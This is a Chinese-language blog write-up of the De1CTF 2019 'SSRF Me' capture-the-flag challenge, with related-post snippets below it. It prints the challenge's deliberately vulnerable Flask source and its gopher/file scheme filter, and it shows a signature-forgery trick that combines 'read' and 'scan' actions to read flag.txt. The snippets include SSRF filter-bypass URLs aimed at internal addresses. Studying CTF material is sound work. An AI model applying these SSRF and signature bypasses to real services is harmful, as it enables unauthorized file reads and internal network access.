[BUU/SSRF] [De1CTF 2019]SSRF Me

最新推荐文章于 2024-05-28 22:13:30 发布
最新推荐文章于 2024-05-28 22:13:30 发布
阅读量289 收藏
点赞数
分类专栏: # 凌晨四点起床刷题 文章标签: flask python SSRF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DARKNOTES/article/details/120772154
版权

[De1CTF 2019]SSRF Me

初审

整理源代码

#! /usr/bin/env python
# #encoding=utf-8
from flask import Flask
from flask import request
import socket
import hashlib
import urllib
import sys
import os
import json

# reload(sys)
# sys.setdefaultencoding('latin1')
app = Flask(__name__)
# 产生一个秘密数值,随机的
secert_key = os.urandom(16)


class Task:
    def __init__(self, action, param, sign, ip):
        # 初始化一些内部变量
        self.action = action
        self.param = param
        self.sign = sign
        self.sandbox = md5(ip)
        # 建立环境沙箱
        if not os.path.exists(self.sandbox):
            # SandBox For Remote_Addr
            os.mkdir(self.sandbox)

    def Exec(self):
        result = {}
        result['code'] = 500

        if self.checkSign():
            if "scan" in self.action:
                tmpfile = open("./%s/result.txt" % self.sandbox, 'w')
                resp = scan(self.param)
                if resp == "Connection Timeout":
                    result['data'] = resp
                else:
                    print(resp)
                    tmpfile.write(resp)
                    tmpfile.close()
                    result['code'] = 200
            if "read" in self.action:
                f = open("./%s/result.txt" % self.sandbox, 'r')
                result['code'] = 200
                result['data'] = f.read()
        	if result['code'] == 500:
            	result['data'] = "Action Error"
        else:
            result['code'] = 500
            result['msg'] = "Sign Error"
        return result

    def checkSign(self):
        if getSign(self.action, self.param) == self.sign:
            return True
        else:
            return False


# generate Sign For Action Scan.
@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
    param = urllib.unquote(request.args.get("param", ""))
    action = "scan"
    return getSign(action, param)


@app.route('/De1ta', methods=['GET', 'POST'])
def challenge():
    action = urllib.unquote(request.cookies.get("action"))
    param = urllib.unquote(request.args.get("param", ""))
    sign = urllib.unquote(request.cookies.get("sign"))
    ip = request.remote_addr
    if waf(param):
        return "No Hacker!!!!"
    task = Task(action, param, sign, ip)
    return json.dumps(task.Exec())


@app.route('/')
def index():
    # 原本为code.txt,此处为了成功运行,修改为本文件
    return open("ssrfme.py", "r").read()


def scan(param):
    # 设置默认的超时时间
    socket.setdefaulttimeout(1)
    try:
        # 返回报文的前50位
        return urllib.urlopen(param).read()[:50]
    except:
        return "Connection Timeout"


def getSign(action, param):
    # 计算三部分的连接的md5值,分别是secert_key + param + action。
    return hashlib.md5(secert_key + param + action).hexdigest()


def md5(content):
    # 封装了文本的MD5求散列值的过程
    return hashlib.md5(content).hexdigest()


def waf(param):
    # 检查开头字符,禁用了gopher和file协议
    check = param.strip().lower()
    if check.startswith("gopher") or check.startswith("file"):
        return True
    else:
        return False


if __name__ == '__main__':
    app.debug = False
    app.run(host='0.0.0.0', port=80, debug=True)

即通过路由/geneSignmd5(secert_key + param + action)进行计算

parma=1		{可替换为任意的地址}
action=scan
7736298a3c9151c091b4daeaecbd1d6c

按照如下的参数进行传参则可以通过该checkSign的验证,

parma=1		{可替换为任意的地址}
action=scan
sign=7736298a3c9151c091b4daeaecbd1d6c

按照该逻辑,会将scan对parma参数的请求结果的前50个字符写入到result.txt

因此有两个需要就解决的问题

1.成功的使action包含read并且成功的通过checkSign的检查。

2.绕过对gopher的过滤,成功读取到文本

解决方法

READ

(1)通过路由/geneSign得到sign值时,action是写死的,但是产出md5的字符串是拼接的。

(2)通过路由/De1ta对scan的值进行检验时,采用的方式位关键字in

采用两套的参数分别进行产生md5md5检验

/geneSign

param=[地址]read
action=scan

/De1ta

param=[地址]
action=readscan
sign=md5(secert_key + param + action)
内网读文件

直接读文件即可,无需使用协议

param=flag.txt
action=readscan
sign=d964cfac6e4451c583723e6fb1093305

请添加图片描述

車鈊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【学习笔记12】buu [De1CTF 2019]SSRF Me
weixin_43553654的博客
05-12 313
打开后看到一堆代码,根本看不懂,不过还好题目上给出了源码的下载位置,并且提示flag is in ./flag.txt,那啥都都不说了,先把源码下载下来吧。 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashl...
apachecn#apachecn-ctf-wiki#[WP/BUU/CTF]Cookie-Store-题解_車鈊的博客-CSD
07-25
来源:,涉及Cookie的使用方法操作方
BUUCTF】[De1CTF 2019]SSRF Me
aoao331198的博客
05-06 239
源码 #! /usr/bin/env python # #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencoding('latin1') app = Flask(__name__) secert_key = os
ssrf刷题——buu [第二章 web进阶]SSRF Training [网鼎杯 2020 玄武组]SSRFMe
最新发布
m0_73756016的博客
05-28 1492
需要用到的工具。
buuctf [De1CTF 2019]SSRF Me
qq_52671379的博客
04-19 998
buuctf [De1CTF 2019]SSRF Me
[BUUCTF][De1CTF 2019]SSRF Me
cosmoslin的博客
11-18 380
考点 读取文件的特殊方法 哈希扩展 解题 提示:flag is in ./flag.txt 直接给出源码,flask框架 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaulten
BUUCTF:[De1CTF 2019]SSRF Me
末初的CSDN博客
04-24 999
https://buuoj.cn/challenges#[De1CTF%202019]SSRF%20Me 源码 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencodi
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
2020年网鼎杯青龙组赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
SSRF-Testing:SSRF(服务器端请求伪造)测试资源
04-23
SSRF(服务器端请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ http://google.com:80+&@google.com:80#+@127.88.23.245:22/ http://127.88.23.245:22/?@google.com:80/ http://127.88.23.245:22/#@www.google.com:80/ http://google.com:80\\@127.88.23.245:22/ htaccess-各种情况下的重定向测试 状态码:300、301、302、303、305、307、308 文件类型:jpg,
BUUCTF [De1CTF 2019] SSRF Me
Senimo
12-20 600
BUUCTF [De1CTF 2019] SSRF Me 考点: Hint: flag is in ./flag.txt 启动环境,给出了源码: #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.s
[De1CTF 2019]SSRF Me | BUUCTF
qq_56313338的博客
09-09 858
本题有多种解法:拼接字符串或者哈希长度拓展攻击
BUU [第二章 web进阶]SSRF Training
qq_62078839的博客
04-18 1802
打开连接发现页面上提示了flag.php,那么flag应该就放在这里了,点开intersting challenge 出现源码,审计代码 <?php highlight_file(__FILE__); function check_inner_ip($url) { $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); if (!$match_result) { ...
[BUUCTF]SSRF Me
Dannie01的博客
10-10 355
perl get 命令执行漏洞 思路: 调用命令GET来执行从url获取的参数, 然后按照filename新建文件,写入GET的结果。 知识点: bash -c “cmd string” 命令 perl脚本GET open命令漏洞 GET是Lib for WWW in Perl中的命令 目的是模拟http的GET请求,GET函数底层就是调用了open处理 open存在命令执行,并且还支持file函数 先创123文件查看根目录 创建 poc1 ?url=/&filename=123 p
Buu-第二届网鼎杯_玄武组web_ssrfme
Fisher
06-08 1106
<?php function check_inner_ip($url) { $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url); if (!$match_result) { die('url fomat error'); } try { $url_parse=parse_url($url); } catch
BUUCTF WEB [De1CTF 2019]SSRF Me
A_dmin的博客
12-20 3644
BUUCTF WEB [De1CTF 2019]SSRF Me 不得不说buuctf是个好网站,很多比赛的题目都有复现!! 题目给了源码: #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urlli...
buu ctf web进阶]ssti
08-23
buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值